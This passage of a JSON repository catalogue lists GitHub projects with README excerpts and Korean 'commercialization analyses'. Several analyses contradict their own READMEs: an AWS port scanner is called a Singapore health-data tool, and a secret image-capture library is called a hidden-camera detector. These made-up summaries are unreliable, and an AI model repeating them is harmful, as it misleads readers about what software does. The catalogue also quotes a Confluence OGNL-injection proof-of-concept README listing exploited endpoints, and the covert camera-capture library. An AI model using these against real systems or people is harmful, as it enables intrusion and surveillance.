for Animal Pose Estimation in the Wild <a href=\"https://arxiv.org/abs/2108.12617\"><img  src=\"https://img.shields.io/badge/arXiv-Paper-<COLOR>.svg\" ></a>\n</a> </h1> \n\n<p align=\"center\">\n  <a href=\"#introduction\">Introduction</a> |\n  <a href=\"#Updates\">Updates</a> |\n  <a href=\"#Overview\">Overview</a> |\n  <a href=\"#download\">Download</a> |\n  <a href=\"#training-code\">Training Code</a> |\n  <a href=\"#key-questions\">Key Questions</a> |\n  <a href=\"#license\">License</a> \n</p>\n\n## Introduction\n\n<p align=\"left\">This repository is the official reporisity of <a href='https://openreview.net/forum?id=rH8yliN6C83'>AP-10K: A Benchmark for Animal Pose Estimation in the Wild</a> (NeurIPS 2021 Datasets and Benchmarks Track). It contains the introduction, annotation files, and code for the dataset AP-10K, which is the first large-scale dataset for general animal pose estimation. AP-10K consists of 10,015 images collected and filtered from 23 animal families and 54 speci","composite_score":0.5011,"license_safety_tag":"unknown"},{"name":"zhengwenming/CopySource","github_url":"https://github.com/zhengwenming/CopySource","stars":19,"language":"Objective-C","license":"MIT","abandonment_months":99,"description":"# CopySource 사업화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 필요한 콘텐츠를 자동으로 찾아 복사해주는 도구로, 반복적인 수작업을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 콘텐츠 수집 기능이 필요한 마케팅 자동화 플랫폼에 내장 기능으로 제공\n2. **내부 업무 도구**: 대량의 웹 데이터를 정리해야 ","readme_excerpt":"# CopySource\niOS项目框架问题（baseVC，baseNav、全屏返回手势、旋转屏幕、截获back返回事件、定制不同VC的返回按钮等等）\n\n//-------*****************项目涵盖知识点*******************-----------\n\n//1、全屏返回（cell左滑动删除的手势冲突，支持全屏和不支持全屏）\n\n//2、左边返回按钮POP点击事件拦截（获取）\n\n//3、BaseNav和BaseVC封装\n\n//4、关于rootVC（登录登出设计）\n\n//5、关于launchImage（删除了之前旧的image并且删除了手机APP，安装后还是旧图，上线后App Store上下载的也还是旧图，WTF！）\n\n//6、iOS旋转屏幕(视频WMPlayer+浏览器+VR)\n\n//7、“让我们一次性解决导航栏的所有问题”（设计思路或bug或技术问题）\n\n    //7.1、透明导航栏\n    \n    //7.2 不同颜色的导航栏\n    \n    //7.3 不同返回按钮\n    \n    //7.4 不带导航-->push 到 带导航的页面，手势返回bug\n    \n    //7.5 动态改变导航栏的透明度\n    \n\n//8、适配iPhone X和iOS 11\n \n    \n    //8.1 扩大iOS 11上返回按钮的点击范围，解决iOS 11上难点击导航栏按钮的bug\n    \n   \n    //8.2 导航栏nav和Tabbar的适配\n    \n    \n    //8.3 添加和修改了一些适配iOS 11的宏\n    \n    \n    //8.4 修正push过程中tabbar上移问题\n    \n    if (@available(iOS 11.0, *)){\n        // 修改tabBra的frame\n        CGRect frame = self.tabBarController.tabBar.frame;\n        frame.origin.y = [UIScreen mainScreen].bounds.size.height - frame.size.height;\n        self.tabBarController.tabBar.frame = frame;\n    }\n","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"GarethRichards/Machine-Learning-CPP","github_url":"https://github.com/GarethRichards/Machine-Learning-CPP","stars":8,"language":"C++","license":"Unlicense","abandonment_months":26,"description":"# GarethRichards/Machine-Learning-CPP 분석\n\n## 왜 보물인가\nC++ 프로그래밍 언어로 만든 머신러닝(컴퓨터 자동 학습) 도구로, 복잡한 데이터 분석을 빠르고 효율적으로 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융사 투자 자동화 플랫폼**: 주식 시장 데이터를 실시간으로 분석하여 투자 추천을 제공하는 구독형","readme_excerpt":"# Machine Learning with C++\n\nThe C++ code in this repository is a hopefully accurate port of the python code in Michael Nielsen's book \n[Neural Networks and Deep Learning](http://neuralnetworksanddeeplearning.com/). I recommend you to read \nMichael Nielson's book and if you wish to use C++ rather than python you can use the code\nin this repository to supplement your understanding. I would also like to thank Grant Sanderson, [3Blue1Brown](https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw/featured) \nfor his entertaining and educational videos on [Machine learning](https://www.youtube.com/watch?v=aircAruvnKk&t=68s) and\nfor introducing me to Michael's book.\nIf you're new to Machine learning I can also recommend as an excellent introduction\n[Machine Learning](https://www.coursera.org/learn/machine-learning/home/welcome) \nby Stanford University on [Coursera](https://www.coursera.org). Finally, thanks to the people who created the \n[MNIST dataset](http://yann.lecun.com/exdb/mnist/) for","composite_score":0.5011,"license_safety_tag":"unknown"},{"name":"goldfiglabs/sgCheckup","github_url":"https://github.com/goldfiglabs/sgCheckup","stars":25,"language":"Go","license":"MPL-2.0","abandonment_months":58,"description":"# sgCheckup 분석 보고서\n\n## 왜 보물인가\n싱가포르의 의료·보건 데이터를 자동으로 검증하고 품질을 관리할 수 있는 도구로, 의료기관과 정부가 신뢰할 수 있는 데이터 관리에 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 싱가포르 병원·클리닉을 대상으로 월 구독형 데이터 품질 검사 플랫폼 운영\n- **내부 업무 도구**: 싱가","readme_excerpt":"# sgCheckup - Check your Security Groups for Unexpected Open Ports & Generate nmap Output\n\n![sgcheckup copy](https://user-images.githubusercontent.com/291215/131573778-34207ba3-35a1-4af4-b3a6-39e32cb806b0.png)\n\n`sgCheckup` is a tool to scan your AWS Security Groups for a combination of open ports and attached Network Interfaces. The goal is to find anything listening on a port that you wouldn't consider safe. In addition to generating reports for security groups, `sgCheckup` can generate and run `nmap` to get specifics.\n\n## Why?\n\nSecurity Groups are an important line of defense for your infrastructure, but as you make changes, it's easy to forget to revert some quick fix that was made to get something working. Having a view into what ports are open and what's listening can help you prioritize locking down access. Using `nmap` to pinpoint specifics as well as fingerprint the open ports further aides with context in locking down security groups.\n\n## Pre-requisites\n\n* AWS Credentials (`~/","composite_score":0.5011,"license_safety_tag":"unknown"},{"name":"CottaCush/HiddenCam","github_url":"https://github.com/CottaCush/HiddenCam","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":59,"description":"# HiddenCam 저장소 분석\n\n## 왜 보물인가\n숨겨진 카메라를 감지하는 기술로, 개인 프라이버시 보호라는 심각한 사회 문제를 해결할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **숙박업소 안전 서비스**: 에어비앤비, 호텔 등이 투숙객을 위한 카메라 감지 앱으로 제공\n- **보안업체 진단 도구**: 보안 컨설팅 회사가 건물/시설 점","readme_excerpt":"# HiddenCamera\n\nA library that allows you to capture images secretly, in background without alerting users.\n\n[![ci](https://github.com/CottaCush/HiddenCam/actions/workflows/ci.yml/badge.svg)](https://github.com/CottaCush/HiddenCam/actions/workflows/ci.yml)\n[![Maven Central](https://img.shields.io/maven-central/v/com.cottacush/HiddenCam.svg?label=Maven%20Central)](https://search.maven.org/search?q=g:%22com.cottacush%22%20AND%20a:%22HiddenCam%22)\n\n## Gradle Dependency\n\nAdd the dependency to your app's `build.gradle`:\n\n```groovy\nimplementation 'com.cottacush:HiddenCam:x.y.z'\n```\nFor versions, kindly head over to the [releases page](https://github.com/CottaCush/HiddenCam/releases)\n\n## Usage\n`HiddenCam` uses `CameraX` under the hood. It is very easy to get started with Hidden cam. \nFirst, initialize the camera engine with a `Context`, A `File` that \nrepresents the base storage folder where the captured images will be saved to, \nand an `OnImageCapturedListener` to get capture results:\n\n```ko","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"stringyland/custom-select","github_url":"https://github.com/stringyland/custom-select","stars":22,"language":"JavaScript","license":"MIT","abandonment_months":73,"description":"","readme_excerpt":"# custom-select\nMy version of a custom select input, with filtering\n\n## The process\nhttps://24ways.org/2019/making-a-better-custom-select-element/\n\n## A demo\nhttps://codepen.io/stringyland/pen/a7106a2577dbc246875275a7c8182abf\n\n## To Do\n* <s>Move status update to start on first focus, not on page load</s>\n* <s>Add the high-contrast focus indicator back (not sure when that got removed?)</s>\n* Add aria-selected attributes to makeChoice, remove on clearValue\n* check arrow navigation works in all screen readers\n  * problems in JAWS/Chrome during filtered state\n  * Talkback/Chrome/Android not working well\n  * NVDA/Firefox seems ok, continue testing\n* Update pattern to ARIA 1.2 - still only a recommendation for the next version, but Sarah Higley's usability testing (https://www.24a11y.com/2019/select-your-poison-part-2/) showed it gave the best results\n* Update script so that both Enter and Space open the list\n* Make the arrow icon pointer-only\n* See if I can make the list appear above or bel","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"oslabs-beta/redis-hawk","github_url":"https://github.com/oslabs-beta/redis-hawk","stars":13,"language":"JavaScript","license":"MIT","abandonment_months":60,"description":"# Redis-Hawk 상용화 분석\n\n## 왜 보물인가\n데이터베이스 성능을 실시간으로 모니터링해서 문제를 미리 발견할 수 있는 관찰 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객사의 데이터베이스 건강도를 자동으로 점검해주는 클라우드 모니터링 서비스\n- **내부 업무 도구**: 스타트업의 개발팀이 자사 서버 상태를 대시보드로 한눈에","readme_excerpt":"<p align='center'>\n  <img src='https://elasticbeanstalk-us-east-2-310828374226.s3.us-east-2.amazonaws.com/demo/redishawk-logo%20%281%29.png' width=\"341\" height=\"256\"/>\n</p>\n\n# redis-hawk\n\nredis-hawk is an easy-to-use monitoring and visualizing web application for understanding granular key-level details for your Redis deployment.\n\nIt can be deployed locally on your desktop or on a server for continuous and remote monitoring of your Redis deployment.\n\n## Table of Contents\n\n* [Features](#features)\n* [Demo](#demo)\n* [Installation](#installation)\n* [Configuration](#configuration)\n* [Feature Roadmap](#feature-roadmap)\n\n## Features\n\nredis-hawk allows you to monitor the keyspace and its events within all databases of any number of deployed instances.\n\n* View details on every keyspace in your Redis deployment\n* View a log of keyspace events occuring in every keyspace\n* View graphs to understand both key and event volumes over time\n* Utilize flexible filters to filter based on a keyname pattern","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"khchen/memlib","github_url":"https://github.com/khchen/memlib","stars":23,"language":"Nim","license":"MIT","abandonment_months":38,"description":"# memlib 저장소 분석\n\n## 왜 보물인가\n컴퓨터의 메모리 관리를 쉽게 해주는 도구로, 프로그래머들이 복잡한 메모리 문제로 골머리 썩지 않도록 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 도구 SaaS**: 메모리 사용량을 실시간으로 모니터링하고 최적화 조언을 제공하는 웹 기반 서비스\n2. **기업 내부 도구**: 대규모 프로젝트를 진행하는","readme_excerpt":"# Memlib\nThis module is designed to be a drop-in replacement for `dynlib pragma` and `dynlib module` in Windows. The main part of this module is a pure nim implementation of the famous MemoryModule library. [MemoryModule](https://github.com/fancycode/MemoryModule) is a C library that can load a DLL completely from memory without storing on the disk first. So that the we can embed all DLLs into the main EXE file.\n\n## Features\n* Nim implementation of MemoryModule with C++ exceptions and SEH support.\n* Dynlib module replacement to load DLL from memory.\n* Dynlib pragma replacement to load DLL at runtime.\n* Compile-time DLL finder for easy embedding.\n* Get address of DLL functions by name or by ordinal.\n* Hook the system API (LoadLibrary and GetProcAddress) to use a memory module.\n\n## Examples\n```nim\nimport memlib\n\n# Embed DLL and load it from memory.\nblock:\n  const dll = staticReadDll(\"sqlite3_64.dll\")\n  proc libversion(): cstring {.cdecl, memlib: dll, importc: \"sqlite3_libversion\".}\n  ech","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"xuhao1/TaichiSLAM","github_url":"https://github.com/xuhao1/TaichiSLAM","stars":5,"language":"Python","license":"LGPL-2.1","abandonment_months":41,"description":"# TaichiSLAM 상용화 분석\n\n## 왜 보물인가\n카메라로 촬영한 영상에서 위치 인식과 3차원 지도 생성을 자동으로 수행하는 기술로, 로봇이나 드론, 스마트폰이 주변 환경을 스스로 이해할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 로봇 청소기·배송 로봇 관리 SaaS**\n로봇들이 건물 내에서 자동으로 길을 찾고 지도를 만들도록 지원하","readme_excerpt":"﻿# TaichiSLAM\r\nThis project is a 3D Dense mapping backend library of SLAM based Taichi-Lang, designed for the aerial swarm.\r\n![](./docs/marchingcubes.png)\r\n\r\n[Demo video](https://www.bilibili.com/video/BV1yu41197Q4/)\r\n\r\n## Intro\r\n[Taichi](https://github.com/taichi-dev/taichi) is an efficient domain-specific language (DSL) designed for computer graphics (CG), which can be adopted for high-performance computing on mobile devices.\r\nThanks to the connection between CG and robotics, we can adopt this powerful tool to accelerate the development of robotics algorithms.\r\n\r\nIn this project, I am trying to take advantages of Taichi, including parallel optimization, sparse computing, advanced data structures and CUDA acceleration.\r\nThe original purpose of this project is to reproduce dense mapping papers, including [Octomap](https://octomap.github.io/), [Voxblox](https://github.com/ethz-asl/voxblox), [Voxgraph](https://github.com/ethz-asl/voxgraph) etc.\r\n\r\nNote: This project is only backend of 3d","composite_score":0.5011,"license_safety_tag":"restricted"},{"name":"lepikhinb/laravel-fluent","github_url":"https://github.com/lepikhinb/laravel-fluent","stars":5,"language":"PHP","license":"MIT","abandonment_months":35,"description":"# laravel-fluent 분석 보고서\n\n## 왜 보물인가\n웹사이트 백엔드 개발을 더 빠르고 쉽게 만들어주는 도구로, 반복적인 코딩 작업을 줄여서 개발자의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 소규모 스타트업이 고객 관리 시스템, 예약 관리 서비스 등을 빠르게 개발할 때 사용\n**2. 내부 업무 도","readme_excerpt":"# Laravel Fluent\n\nThe package provides an expressive \"fluent\" way to define model attributes. It automatically builds casts at the runtime and adds a native autocompletion to the models' properties.\n\n## Introduction\nWith `laravel-fluent`, you can define Model attributes as you would do with any other class. The values will be transformed to the corresponding types depending on the native types of the properties.\n\nBefore:\n```php\n<?php\n\n/**\n * @property Collection $features\n * @property float $price\n * @property int $available\n */\nclass Product extends Model\n{\n    protected $casts = [\n        'features' => 'collection',\n        'price' => 'float',\n        'available' => 'integer',\n    ];\n}\n```\n\nAfter:\n```php\n<?php\n\nclass Product extends Model\n{\n    use Fluent;\n\n    public Collection $features;\n    public float $price;\n    public int $available;\n}\n```\n\n## Installation\n\nThis version supports PHP 8.0. You can install the package via composer:\n\n```bash\ncomposer require based/laravel-fluent\n`","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"postcss/postcss-custom-media","github_url":"https://github.com/postcss/postcss-custom-media","stars":6,"language":"JavaScript","license":"mit","abandonment_months":48,"description":"# postcss/postcss-custom-media 분석\n\n## 왜 보물인가\n웹사이트를 여러 크기의 화면(휴대폰, 태블릿, 컴퓨터)에서 잘 보이도록 자동으로 정렬해주는 개발자 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **반응형 웹 디자인 SaaS**: 마우스 클릭만으로 다양한 화면 크기에 자동 최적화되는 웹사이트 빌더\n2. **웹사이트 제작 에이전시","readme_excerpt":"<div align=\"center\">⚠️ PostCSS Custom Media was moved to <a href=\"https://github.com/csstools/postcss-plugins/tree/main/plugins/postcss-custom-media\">@csstools/postcss-plugins</a>. ⚠️ <br>\n<a href=\"https://github.com/csstools/postcss-plugins/discussions/75\">Read the announcement</a></div>\n\n# PostCSS Custom Media [<img src=\"https://postcss.github.io/postcss/logo.svg\" alt=\"PostCSS\" width=\"90\" height=\"90\" align=\"right\">][postcss]\n\n[![NPM Version][npm-img]][npm-url]\n[![CSS Standard Status][css-img]][css-url]\n[![Build Status][cli-img]][cli-url]\n[![Support Chat][git-img]][git-url]\n\n[PostCSS Custom Media] lets you use Custom Media Queries in CSS, following the\n[CSS Media Queries] specification.\n\n```pcss\n@custom-media --small-viewport (max-width: 30em);\n\n@media (--small-viewport) {\n  /* styles for small viewport */\n}\n\n/* becomes */\n\n@media (max-width: 30em) {\n  /* styles for small viewport */\n}\n```\n\n## Usage\n\nAdd [PostCSS Custom Media] to your project:\n\n```bash\nnpm install postcss-custom-media","composite_score":0.501,"license_safety_tag":"safe"},{"name":"semi-technologies/semantic-search-through-wikipedia-with-weaviate","github_url":"https://github.com/semi-technologies/semantic-search-through-wikipedia-with-weaviate","stars":7,"language":"Python","license":"MIT","abandonment_months":36,"description":"# semantic-search-through-wikipedia-with-weaviate 분석\n\n## 왜 보물인가\n위키피디아의 방대한 정보 속에서 원하는 답을 자동으로 찾아주는 '지능형 검색 기술'을 실제로 구현한 살아있는 예제입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 내부 매뉴얼/FAQ를 학습한 '스마트 고객지원 챗봇' 서비스","readme_excerpt":"# Semantic search through Wikipedia with the Weaviate vector search engine\n\n> this repo is archived. You can still use it except for the live demo links. \n\n[Weaviate](https://weaviate.io/developers/weaviate/current/) is an open source vector search engine with build-in vectorization and question answering modules. We imported the complete English language Wikipedia article dataset into a single Weaviate instance to conduct semantic search queries through the Wikipedia articles, besides this, we've made all the graph relations between the articles too. We have made the import scripts, pre-processed articles, and backup available so that you can run the complete setup yourself. \n\nIf you like what you see, a ⭐ on the [Weaviate Github repo](https://github.com/semi-technologies/weaviate/stargazers) or joining our [Slack](https://weaviate.io/slack) is appreciated.\n\n### Link to the Tutorial\n\n* [Semantic search through Wikipedia tutorial](https://weaviate.io/blog/semantic-search-with-wikipedia","composite_score":0.501,"license_safety_tag":"safe"},{"name":"DamnVulnerableCryptoApp/DamnVulnerableCryptoApp","github_url":"https://github.com/DamnVulnerableCryptoApp/DamnVulnerableCryptoApp","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":39,"description":"# DamnVulnerableCryptoApp 분석 보고서\n\n## 왜 보물인가\n암호화 보안의 취약점을 학습하고 실습할 수 있는 교육용 플랫폼으로, 기업의 보안 담당자들이 실제 위협을 이해하고 대비하는 데 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 교육 SaaS**\n- 직원들의 암호화 보안 지식을 평가하고 개선하는 구독형 교육 플랫폼으","readme_excerpt":"![Logo](/frontend/src/Images/logo.png)\n\n![GitHub package.json version](https://img.shields.io/github/package-json/v/damnvulnerablecryptoapp/damnvulnerablecryptoapp?style=flat-square&label=Version)\n![GitHub Workflow Status](https://img.shields.io/github/workflow/status/DamnVulnerableCryptoApp/DamnVulnerableCryptoApp/Build?style=flat-square&label=Build)\n![GitHub](https://img.shields.io/github/license/damnvulnerablecryptoapp/damnvulnerablecryptoapp?style=flat-square&label=License)\n![GitHub repo size](https://img.shields.io/github/repo-size/damnvulnerablecryptoapp/damnvulnerablecryptoapp?style=flat-square&label=Repo%20Size)\n![Docker Image Size (latest by date)](https://img.shields.io/docker/image-size/damnvulnerablecryptoapp1/damnvulnerablecryptoapp?style=flat-square&label=Docker%20Image)\n![GitHub contributors](https://img.shields.io/github/contributors/damnvulnerablecryptoapp/damnvulnerablecryptoapp?style=flat-square&label=Contributors)\n![GitHub commit activity](https://img.shields.io/git","composite_score":0.501,"license_safety_tag":"safe"},{"name":"OliverRensu/Shunted-Transformer","github_url":"https://github.com/OliverRensu/Shunted-Transformer","stars":11,"language":"Python","license":"unknown","abandonment_months":54,"description":"# Shunted-Transformer 분석\n\n## 왜 보물인가\nAI 모델의 처리 속도와 효율성을 동시에 개선하는 새로운 구조로, 비용을 줄이면서도 더 빠르고 똑똑한 AI 서비스를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **음성·번역 AI 서비스**: 실시간 통역이나 음성인식 앱에서 응답 속도를 2배 이상 빠르게 하면서 서버 비용은 절감\n2.","readme_excerpt":"# Shunted Transformer\n\nThis is the offical implementation of [Shunted Self-Attention via Multi-Scale Token Aggregation](https://arxiv.org/abs/2111.15193)\nby Sucheng Ren, Daquan Zhou, Shengfeng He, Jiashi Feng, Xinchao Wang\n### Training from scratch\n\n## Training\n```shell\nbash dist_train.sh\n```\n\n## Model Zoo\nThe checkpoints can be found at [Goolge Drive](https://drive.google.com/drive/folders/15iZKXFT7apjUSoN2WUMAbb0tvJgyh3YP?usp=sharing), [Baidu Pan](https://pan.baidu.com/s/1a9nVWpw2SzP0csCBCF8DNw) (code:hazr) (Checkpoints of the large models are coming soon.)\n\n| Method           | Size | Acc@1 | #Params (M) |\n|------------------|:----:|:-----:|:-----------:|\n| Shunted-T        |  224 |  79.8 |    11.5     |\n| Shunted-S        |  224 |  82.9 |    22.4     |\n| Shunted-B        |  224 |  84.0 |    39.6     |\n\n\n## Citation\n```shell\n@misc{ren2021shunted,\n      title={Shunted Self-Attention via Multi-Scale Token Aggregation}, \n      author={Sucheng Ren and Daquan Zhou and Shengfeng He and Ji","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"JunHeum/ABME","github_url":"https://github.com/JunHeum/ABME","stars":5,"language":"Python","license":"MIT","abandonment_months":57,"description":"# JunHeum/ABME 분석 보고서\n\n## 왜 보물인가\n저장소 정보가 매우 제한적(설명 없음, Stars 5개, 마지막 업데이트 2021년 9월)이어서 실제 가치를 판단하기 어렵습니다.\n현재로서는 충분한 검증 없이 평가하기 위험합니다.\n\n## 어디에 쓸 수 있나\n**기술 검증 부족으로 구체적 활용처 파악 불가** - 저장소의 README나 문서화 정보가","readme_excerpt":"# ABME (ICCV2021)\n[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/asymmetric-bilateral-motion-estimation-for/video-frame-interpolation-on-vimeo90k)](https://paperswithcode.com/sota/video-frame-interpolation-on-vimeo90k?p=asymmetric-bilateral-motion-estimation-for)\n[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/asymmetric-bilateral-motion-estimation-for/video-frame-interpolation-on-x4k1000fps)](https://paperswithcode.com/sota/video-frame-interpolation-on-x4k1000fps?p=asymmetric-bilateral-motion-estimation-for)\n\n\nJunheum Park,\nChul Lee,\nand Chang-Su Kim\n\nOfficial PyTorch Code for **\"Asymmetric Bilateral Motion Estimation for Video Frame Interpolation\"** [[paper]](https://arxiv.org/abs/2108.06815)\n\n### Requirements\n- PyTorch 1.7\n- CUDA 11.0\n- CuDNN 8.0.5\n- python 3.8\n\n### Installation\nCreate conda environment:\n```bash\n    $ conda create -n ABME python=3.8 anaconda\n    $ conda activate ABME\n    $ pip install opencv-python\n ","composite_score":0.501,"license_safety_tag":"safe"},{"name":"alt3kx/CVE-2021-26084_PoC","github_url":"https://github.com/alt3kx/CVE-2021-26084_PoC","stars":16,"language":"","license":"GPL-3.0","abandonment_months":58,"description":"# CVE-2021-26084_PoC 분석 보고서\n\n## 왜 보물인가\n특정 소프트웨어의 보안 허점을 찾아내는 도구로, 이를 활용하면 미리 문제를 발견하고 대비할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 진단 SaaS**: 기업의 IT 시스템을 자동으로 검사해주는 온라인 서비스로 운영\n2. **기업 보안팀 내부 도구**: 회사의 컴퓨터 시스템 ","readme_excerpt":"# CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injection\n\nAn OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n![poc](https://user-images.githubusercontent.com/3140111/131589227-c305cfb8-bcb9-4c87-a814-9b898fd2f393.png)\n\nMy fight to locate the entrypoints and injections XD \n\nFight (1) | Fight (2)\n --- | ---\n![2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium](https://user-images.githubusercontent.com/3140111/131591912-bfe20ca8-df08-477c-af1c-1c3f3aacbb17.png) | ![2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium](https://user-images.githubusercontent.com/3140111/131591918-1023e2de-3391-46cd-af2a-14d9cac25e63.png)\n\nFinally confluence Entrypoints Exploited \n\n```\nhttps://<REDACTED>/users/user-dark-features\nhttps://<REDACTED>/login\nhttps://<REDACTED>/pages/templates2/viewpagetemplate.action\nhttps://<REDAC","composite_score":0.501,"license_safety_tag":"restricted"},{"name":"nalexai/hyperlib","github_url":"https://github.com/nalexai/hyperlib","stars":25,"language":"Python","license":"MIT","abandonment_months":26,"description":"# hyperlib 프로젝트 분석\n\n## 왜 보물인가\n복잡한 데이터 처리를 간단하게 만들어주는 프로그래밍 라이브러리로, 개발자들의 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 고객 분석, 마케팅 통계 같은 분석 기능이 필요한 웹 서비스에 내장\n2. **내부 업무 도구**: 회사 내부에서 대량의 고객 ","readme_excerpt":"# HyperLib: Deep learning in the Hyperbolic space\n\n[![PyPI version](https://badge.fury.io/py/hyperlib.svg)](https://badge.fury.io/py/hyperlib)\n\n## Background\nThis library implements common Neural Network components in the hyperbolic space (using the Poincare model). The implementation of this library uses Tensorflow as a backend and can easily be used with Keras and is meant to help Data Scientists, Machine Learning Engineers, Researchers and others to implement hyperbolic neural networks.\n\nYou can also use this library for uses other than neural networks by using the mathematical functions available in the Poincare class. In the future we may implement components that can be used in models other than neural networks. You can learn more about Hyperbolic networks [here](https://elevateailabs.com/blog/hyperlib), and in the references[^1] [^2] [^3] [^4].\n\n## Install\nThe recommended way to install is with pip\n```\npip install hyperlib\n```\n\nTo build from source, you need to compile the pybin","composite_score":0.501,"license_safety_tag":"safe"},{"name":"Sanyuan-Chen/CSS_with_Conformer","github_url":"https://github.com/Sanyuan-Chen/CSS_with_Conformer","stars":12,"language":"Python","license":"unknown","abandonment_months":39,"description":"# Sanyuan-Chen/CSS_with_Conformer 분석\n\n## 왜 보물인가\n음성 인식 기술의 정확도를 획기적으로 높일 수 있는 AI 모델이라 음성 기반 서비스(음성 검색, 음성 통역, 음성 메모 등)를 만드는 회사들에게 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 음성 받아쓰기 SaaS 서비스**\n회의 음성을 자동으로 텍스트로 변환해주","readme_excerpt":"# Continuous Speech Separation with Conformer\r\n\r\n## Introduction\r\n\r\nWe examine the use of the Conformer architecture for continuous speech separation. \r\nConformer allows the separation model to efficiently capture both local and global context information, which is helpful for speech separation.\r\nExperimental results using the LibriCSS dataset show that the Conformer separation model achieves state of the art results for both single-channel and multi-channel settings.\r\n\r\nFor a detailed description and experimental results, please refer to our paper: [Continuous Speech Separation with Conformer](https://arxiv.org/abs/2008.05773) (Accepted by ICASSP 2021).\r\n\r\n## Environment\r\npython 3.6.9, torch 1.7.1\r\n\r\n## Get Started\r\n1. Download the overlapped speech of [LibriCSS dataset](https://github.com/chenzhuo1011/libri_css).\r\n    \r\n    - from Google drive:\r\n    ```bash\r\n    wget --load-cookies /tmp/cookies.txt \"https://docs.google.com/uc?export=download&confirm=$(wget --quiet --save-cookies /tmp","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"colorful-liyu/SJTU-ziranbianzhengfa-docs","github_url":"https://github.com/colorful-liyu/SJTU-ziranbianzhengfa-docs","stars":41,"language":"","license":"unknown","abandonment_months":54,"description":"# SJTU-ziranbianzhengfa-docs 분석\n\n## 왜 보물인가\n상하이교통대학의 자연변증법(변증법적 유물론) 강의 자료를 체계적으로 정리한 공개 학습 자료로, 철학 교육 디지털화의 수요를 충족합니다.\n\n## 어디에 쓸 수 있나\n\n1. **대학 온라인 강의 플랫폼**: 철학과 변증법 학습자를 위한 구조화된 교재 제공 서비스\n2. **기업 직원 교","readme_excerpt":"# SJTU-研究生自然辩证法重点考点总结资料\n\n### 本份资料汇总于2021年秋，分为2021秋考题原题、考试题型复习指南、复习简纲和具体知识梳理四部分。其中考试题型复习指南请务必认真对待！而具体知识梳理部分有概论章、自然观章、马克思主义科学技术观、辩证思维方法、马克思主义科学技术社会论、中特科学技术多种观、遗漏补充等几章。\n### 手打不易，如果观众老爷觉得有用，请给一个小星星star吧~ ，在本页面右上角，感激不尽~ \n#### 2021/11/29:  此外，文件中补充了学生整理的论述题参考答案，以及往年的总结与题目。另外，有一份很棒的考题复习推送https://mp.weixin.qq.com/s/snW-SPebEkD34I2tLeuP4Q ，来自于上交土木二班公众号。\n#### 2021/12/3：本次考试已经结束，总结一下：\n考前一定要抓住老师的重点来复习，像简答题20分，论述60分，都是有勾住的。抓住老师的重点来复习事半功倍~ 不过呢，一些老师的重点很重点，一些老师的重点不够重点，要注意分辨这点。然后选择题考了一堆一堆的书名作者和观点提出者，真的很难复习。。\n\n##### MADE BY 鲤鱼, 如有错误可直接在issues区反馈。带两级制表符的内容大都为解释说明内容，是辅助记忆要点之用，不需要死记。\n\nP.S. 感谢鲲同学记录的上课笔记与整理的论述题答案；感谢之前总结各种文件的同学，其署名原封保存在原文件中。\n\n##### 另外，我们实验室主攻方向为用深度学习的方法完成3D的驱动、艺术图像的生成模型等，最新工作进展会发布在GITHUB组织AIARTSJTU中，https://github.com/AIARTSJTU/NeuralRenderingTutorial 是师兄写的一个很棒的深度学习生成模型入门手册，https://github.com/neuralchen/SimSwap 是很好的换脸工作，已有1.5Kstar，在这里小小地宣传一下~ \n\n\n\n# 2021自然辩证法考题：\n### 选择题\n* 实证主义的提出者：孔德\n* 有个是费朗西斯·培根，而不是罗培尔·培根\n* 提出世界的本源是由无限构成的古希腊哲学家\n* 《寂静的春天》作者：卡逊\n* 《科学:无尽的前沿》作者：范内瓦·布什\n* 耗散论提出者：普里戈金\n* 剩下题记不清了\n\n###","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"earthquake/Socks5Server","github_url":"https://github.com/earthquake/Socks5Server","stars":24,"language":"C++","license":"unknown","abandonment_months":41,"description":"# Socks5Server 상용화 분석\n\n## 왜 보물인가\n인터넷 연결을 안전하게 중계해주는 핵심 기술로, 개인정보 보호가 중요한 기업들이 반드시 필요로 하는 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 VPN 서비스**: 직원들의 원격 접속을 안전하게 관리하는 SaaS 플랫폼으로 제공\n2. **프라이빗 네트워크 API**: 기업이 자체 시스템에","readme_excerpt":"# Socks5Server\nWindows C/C++ Socks5 